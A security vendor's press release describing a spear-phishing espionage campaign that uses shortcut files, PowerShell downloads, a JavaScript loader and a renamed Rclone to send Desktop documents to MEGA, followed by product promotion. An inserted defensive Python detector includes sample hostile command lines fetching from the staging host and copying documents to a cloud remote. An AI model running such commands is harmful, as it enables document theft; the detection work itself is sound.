
Pune, March 2026: Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has uncovered Operation CamelClone, an active, multi-region cyber espionage campaign targeting government, defense, diplomatic, and strategic energy organisations across Algeria, Mongolia, Ukraine, and Kuwait.
Tracked by the APT research team at Seqrite Labs, India’s largest malware analysis facility, Operation CamelClone uses precision-crafted spear-phishing lures impersonating real ministries and armed forces to deliver a stealthy infection chain that exfiltrates sensitive documents, including procurement plans, policy drafts, and Telegram session data, to anonymous cloud storage accounts, leaving virtually no trace in standard network logs.
The campaign begins with ZIP archives sent via spear-phishing emails, bundling a malicious Windows shortcut (.lnk) file with convincing decoy content, such as “Weapons requirements for the Kuwait Air Force” or “Algerian Ukrainian proposals for cooperation.” When opened, the shortcut silently triggers PowerShell commands that download a JavaScript loader, tracked as HOPPINGANT, from the public file-sharing site filebulldogs[.]com.
HOPPINGANT then retrieves additional payloads and deploys Rclone, a legitimate file-sync utility, disguised as l.exe, which is configured to authenticate with MEGA cloud storage accounts registered through anonymous email addresses. The malware systematically collects .doc, .docx, .pdf, and .txt files from the victim’s Desktop, exfiltrating them silently to attacker-controlled MEGA folders. Consistent use of a single XOR key, identical Rclone configurations, and the same staging infrastructure across all four regions confirm this is one coordinated, ongoing operation.
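A defender's view of the chain described above, as an added example that is not from Seqrite's report: a Python triage over process-creation events that flags a PowerShell fetch from the staging host and an Rclone-style transfer run under another file name. The event fields, sample command lines, the remote name `remote1` and the Rclone arguments are constructed assumptions; the campaign's actual command lines are not given here.

```python
import re

# Hostname from the write-up, stored defanged and refanged only for matching.
STAGING_HOST = "filebulldogs[.]com".replace("[.]", ".")
DOC_EXTS = (".doc", ".docx", ".pdf", ".txt")          # file types named in the write-up
RCLONE_VERB = re.compile(r"\s(copy|copyto|sync|move)\s", re.I)
# rclone "remote:path" argument; drive paths (C:\...) and URLs (https://...) do not match
REMOTE_SPEC = re.compile(r"\s[\w-]+:(?!//)[^\\\s]*(\s|$)")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def findings(event):
    """Return the reasons one process-creation event matches the described chain."""
    image, cmd = basename(event["image"]), event["command_line"]
    low = cmd.lower()
    reasons = []
    if image in ("powershell.exe", "pwsh.exe") and STAGING_HOST in low:
        reasons.append("powershell-fetch-from-staging-host")
    rclone_like = bool(RCLONE_VERB.search(cmd) and REMOTE_SPEC.search(cmd))
    if rclone_like and image != "rclone.exe":
        reasons.append("renamed-rclone-transfer")
    if rclone_like and "\\desktop" in low and any("*" + e in low for e in DOC_EXTS):
        reasons.append("desktop-documents-to-cloud-remote")
    return reasons

# Constructed sample events (not captured from the campaign); paths, the remote
# name "remote1" and PLACEHOLDER are made up for illustration.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Invoke-WebRequest https://"
                     + STAGING_HOST + "/PLACEHOLDER"},
    {"image": r"C:\Users\Public\l.exe",
     "command_line": r"l.exe copy C:\Users\alice\Desktop remote1:inbox --include *.pdf --include *.docx"},
    {"image": r"C:\Windows\System32\robocopy.exe",
     "command_line": r"robocopy.exe C:\Data D:\Backup /MIR"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["image"]), findings(ev))
```

A legitimately named rclone.exe syncing Desktop documents still raises the third finding, so an allow-list of approved backup jobs is needed before alerting on it.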
Operation CamelClone reflects a broader evolution in state-aligned threats that Seqrite’s India Cyber Threat Report 2026 has documented in detail. The report, drawn from telemetry across more than 8 million endpoints, recorded 265.52 million detections between October 2024 and September 2025, averaging 505 every minute, with APT-linked campaigns blending espionage, hacktivism, and data extortion becoming significantly more prevalent. By relying entirely on legitimate services such as PowerShell, Rclone, MEGA, and public file-sharing sites, Operation CamelClone bypasses conventional security tools, representing precisely the kind of “cognitive intrusion” Seqrite’s 2026 forecast warned was coming.
For governments and critical institutions, the stakes are not limited to system access. When adversaries exfiltrate documents containing personal data of citizens, employees, or diplomatic contacts, obligations under India’s Digital Personal Data Protection (DPDP) Act, 2023 are immediately triggered, including breach notification and accountability for safeguard failures, with penalties up to ₹250 crore.
All Seqrite products are fully compliant with the DPDP Act. Seqrite’s enterprise portfolio, including Seqrite Data Privacy, Seqrite Threat Intelligence, Ransomware Recovery as a Service (RRaaS), and the Digital Risk Protection Service, provides a layered, AI-powered shield purpose-built to detect campaigns like Operation CamelClone, classify and protect targeted document types, and meet regulatory obligations end-to-end.




